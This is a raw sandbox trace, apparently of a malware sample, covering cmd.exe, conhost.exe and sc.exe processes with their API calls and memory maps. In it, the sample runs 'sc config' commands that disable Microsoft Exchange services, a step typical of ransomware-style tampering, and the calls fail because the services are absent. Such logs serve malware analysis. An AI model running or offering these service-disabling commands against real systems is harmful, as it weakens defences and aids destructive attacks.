_wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0129.318] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.319] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeAB start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x49ff3b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeAB start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x49ff3fc | out: lpCommandLine="sc config MSExchangeAB start= disabled", lpProcessInformation=0x49ff3fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf10, dwThreadId=0xf08)) returned 1 [0129.325] CloseHandle (hObject=0xa4) returned 1 [0129.325] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.325] GetEnvironmentStringsW () returned 0x4d59ef8* [0129.325] FreeEnvironmentStringsA (penv="=") returned 1 [0129.325] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0129.368] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x49ff394 | out: lpExitCode=0x49ff394*=0x424) returned 1 [0129.369] CloseHandle (hObject=0xa8) returned 1 [0129.369] _vsnwprintf (in: _Buffer=0x49ff47c, _BufferCount=0x13, _Format="%08X", _ArgList=0x49ff39c | out: _Buffer="00000424") returned 8 [0129.369] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0129.369] GetEnvironmentStringsW () returned 0x4d5b368* [0129.369] FreeEnvironmentStringsA (penv="=") returned 1 [0129.369] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.369] GetEnvironmentStringsW () returned 0x4d5b368* [0129.369] FreeEnvironmentStringsA (penv="=") returned 1 [0129.369] DeleteProcThreadAttributeList (in: lpAttributeList=0x49ff428 | out: lpAttributeList=0x49ff428) [0129.369] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.369] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.371] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.371] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.371] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.371] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.372] SetConsoleInputExeNameW () returned 0x1 [0129.372] GetConsoleOutputCP () returned 0x1b5 [0129.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.372] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.372] exit (_Code=1060) Thread: id = 429 os_tid = 0xf14 Process: id = "117" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2647e000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "116" os_parent_pid = "0xec0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6722 start_va = 0x7f64b000 end_va = 0x7f64bfff entry_point = 0x0 region_type = private name = "private_0x000000007f64b000" filename = "" Region: id = 6723 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6724 start_va = 0x8899ea0000 end_va = 0x8899ebffff entry_point = 0x0 region_type = private name = "private_0x0000008899ea0000" filename = "" Region: id = 6725 start_va = 0x8899ec0000 end_va = 0x8899ed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008899ec0000" filename = "" Region: id = 6726 start_va = 0x8899ee0000 end_va = 0x8899f1ffff entry_point = 0x0 region_type = private name = "private_0x0000008899ee0000" filename = "" Region: id = 6727 start_va = 0x7df5ff210000 end_va = 0x7ff5ff20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff210000" filename = "" Region: id = 6728 start_va = 0x7ff6c3d80000 end_va = 0x7ff6c3da2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d80000" filename = "" Region: id = 6729 start_va = 0x7ff6c3dad000 end_va = 0x7ff6c3dadfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dad000" filename = "" Region: id = 6730 start_va = 0x7ff6c3dae000 end_va = 0x7ff6c3daffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dae000" filename = "" Region: id = 6731 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6732 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6733 start_va = 0x8899ea0000 end_va = 0x8899eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008899ea0000" filename = "" Region: id = 6734 start_va = 0x8899eb0000 end_va = 0x8899eb6fff entry_point = 0x0 region_type = private name = "private_0x0000008899eb0000" filename = "" Region: id = 6735 start_va = 0x8899f20000 end_va = 0x8899fddfff entry_point = 0x8899f20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6736 start_va = 0x8899fe0000 end_va = 0x889a0dffff entry_point = 0x0 region_type = private name = "private_0x0000008899fe0000" filename = "" Region: id = 6737 start_va = 0x889a0e0000 end_va = 0x889a11ffff entry_point = 0x0 region_type = private name = "private_0x000000889a0e0000" filename = "" Region: id = 6738 start_va = 0x889a120000 end_va = 0x889a120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000889a120000" filename = "" Region: id = 6739 start_va = 0x889a130000 end_va = 0x889a136fff entry_point = 0x0 region_type = private name = "private_0x000000889a130000" filename = "" Region: id = 6740 start_va = 0x889a140000 end_va = 0x889a140fff entry_point = 0x0 region_type = private name = "private_0x000000889a140000" filename = "" Region: id = 6741 start_va = 0x889a150000 end_va = 0x889a150fff entry_point = 0x0 region_type = private name = "private_0x000000889a150000" filename = "" Region: id = 6742 start_va = 0x889a1e0000 end_va = 0x889a1effff entry_point = 0x0 region_type = private name = "private_0x000000889a1e0000" filename = "" Region: id = 6743 start_va = 0x889a1f0000 end_va = 0x889a377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000889a1f0000" filename = "" Region: id = 6744 start_va = 0x889a380000 end_va = 0x889a500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000889a380000" filename = "" Region: id = 6745 start_va = 0x889a510000 end_va = 0x889b90ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000889a510000" filename = "" Region: id = 6746 start_va = 0x7ff6c3c80000 end_va = 0x7ff6c3d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c80000" filename = "" Region: id = 6747 start_va = 0x7ff6c3dab000 end_va = 0x7ff6c3dacfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3dab000" filename = "" Region: id = 6748 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6749 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6750 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6751 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6752 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6753 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6754 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6755 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6756 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6757 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6758 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6759 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6760 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6761 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 426 os_tid = 0xf1c Thread: id = 427 os_tid = 0xf18 Thread: id = 428 os_tid = 0xf0c Process: id = "118" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x26bf9000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "116" os_parent_pid = "0xec0" cmd_line = "sc config MSExchangeAB start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6775 start_va = 0x3b0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 6776 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6777 start_va = 0x3e0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 6778 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6779 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6780 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 6781 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6782 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6783 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 6784 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 6785 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6786 start_va = 0x7e260000 end_va = 0x7e282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e260000" filename = "" Region: id = 6787 start_va = 0x7e28b000 end_va = 0x7e28dfff entry_point = 0x0 region_type = private name = "private_0x000000007e28b000" filename = "" Region: id = 6788 start_va = 0x7e28e000 end_va = 0x7e28efff entry_point = 0x0 region_type = private name = "private_0x000000007e28e000" filename = "" Region: id = 6789 start_va = 0x7e28f000 end_va = 0x7e28ffff entry_point = 0x0 region_type = private name = "private_0x000000007e28f000" filename = "" Region: id = 6790 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6791 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6792 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6793 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6794 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6795 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 6796 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6797 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6798 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 6799 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6800 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 6801 start_va = 0x3c0000 end_va = 0x3c3fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 6802 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6803 start_va = 0x4b0000 end_va = 0x56dfff entry_point = 0x4b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6804 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6805 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 6806 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6807 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6808 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6809 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6810 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6811 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6812 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6813 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6814 start_va = 0x7e160000 end_va = 0x7e25ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e160000" filename = "" Region: id = 6815 start_va = 0x7e288000 end_va = 0x7e28afff entry_point = 0x0 region_type = private name = "private_0x000000007e288000" filename = "" Region: id = 6816 start_va = 0x730000 end_va = 0x80efff entry_point = 0x730000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 6817 start_va = 0x5c0000 end_va = 0x5d1fff entry_point = 0x5c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 430 os_tid = 0xf08 [0129.358] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0129.358] __set_app_type (_Type=0x1) [0129.358] __p__fmode () returned 0x77ac4d6c [0129.358] __p__commode () returned 0x77ac5b1c [0129.358] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0129.358] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0129.358] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.360] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.360] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0129.360] _wcsicmp (_String1="config", _String2="query") returned -14 [0129.360] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0129.360] _wcsicmp (_String1="config", _String2="start") returned -16 [0129.360] _wcsicmp (_String1="config", _String2="pause") returned -13 [0129.360] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0129.360] _wcsicmp (_String1="config", _String2="control") returned -14 [0129.360] _wcsicmp (_String1="config", _String2="continue") returned -14 [0129.360] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.360] _wcsicmp (_String1="config", _String2="config") returned 0 [0129.360] ResolveDelayLoadedAPI () returned 0x77262c10 [0129.360] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5f8530 [0129.362] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0129.362] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0129.362] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0129.362] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0129.362] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0129.362] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0129.362] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0129.362] OpenServiceW (hSCManager=0x5f8530, lpServiceName="MSExchangeAB", dwDesiredAccess=0x3) returned 0x0 [0129.363] GetLastError () returned 0x424 [0129.363] _ultow (in: _Dest=0x424, _Radix=4718044 | out: _Dest=0x424) returned="1060" [0129.363] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0129.364] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x47fdb8, nSize=0x2, Arguments=0x47fdd0 | out: lpBuffer="裀_ﷸG蔔è") returned 0x62 [0129.364] GetFileType (hFile=0x3c) returned 0x2 [0129.364] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47fd9c | out: lpMode=0x47fd9c) returned 1 [0129.364] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5f88c0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x47fdac, lpReserved=0x0 | out: lpBuffer=0x5f88c0*, lpNumberOfCharsWritten=0x47fdac*=0x62) returned 1 [0129.365] LocalFree (hMem=0x5f88c0) returned 0x0 [0129.365] LocalFree (hMem=0x0) returned 0x0 [0129.365] CloseServiceHandle (hSCObject=0x5f8530) returned 1 [0129.365] LocalFree (hMem=0x0) returned 0x0 [0129.365] exit (_Code=1060) Thread: id = 431 os_tid = 0xf00 Process: id = "119" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x269b8000" os_pid = "0xef0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeAntispamUpdate start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6818 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6819 start_va = 0x880000 end_va = 0x487ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 6820 start_va = 0x4880000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 6821 start_va = 0x48a0000 end_va = 0x48a1fff entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 6822 start_va = 0x48b0000 end_va = 0x48c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 6823 start_va = 0x48d0000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 6824 start_va = 0x4910000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 6825 start_va = 0x4a10000 end_va = 0x4a13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 6826 start_va = 0x4a20000 end_va = 0x4a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 6827 start_va = 0x4a30000 end_va = 0x4a31fff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 6828 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6829 start_va = 0x7e720000 end_va = 0x7e742fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e720000" filename = "" Region: id = 6830 start_va = 0x7e749000 end_va = 0x7e74bfff entry_point = 0x0 region_type = private name = "private_0x000000007e749000" filename = "" Region: id = 6831 start_va = 0x7e74c000 end_va = 0x7e74cfff entry_point = 0x0 region_type = private name = "private_0x000000007e74c000" filename = "" Region: id = 6832 start_va = 0x7e74f000 end_va = 0x7e74ffff entry_point = 0x0 region_type = private name = "private_0x000000007e74f000" filename = "" Region: id = 6833 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6834 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6835 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6836 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6837 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6838 start_va = 0x4bf0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 6839 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6840 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6841 start_va = 0x4a60000 end_va = 0x4b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 6842 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: 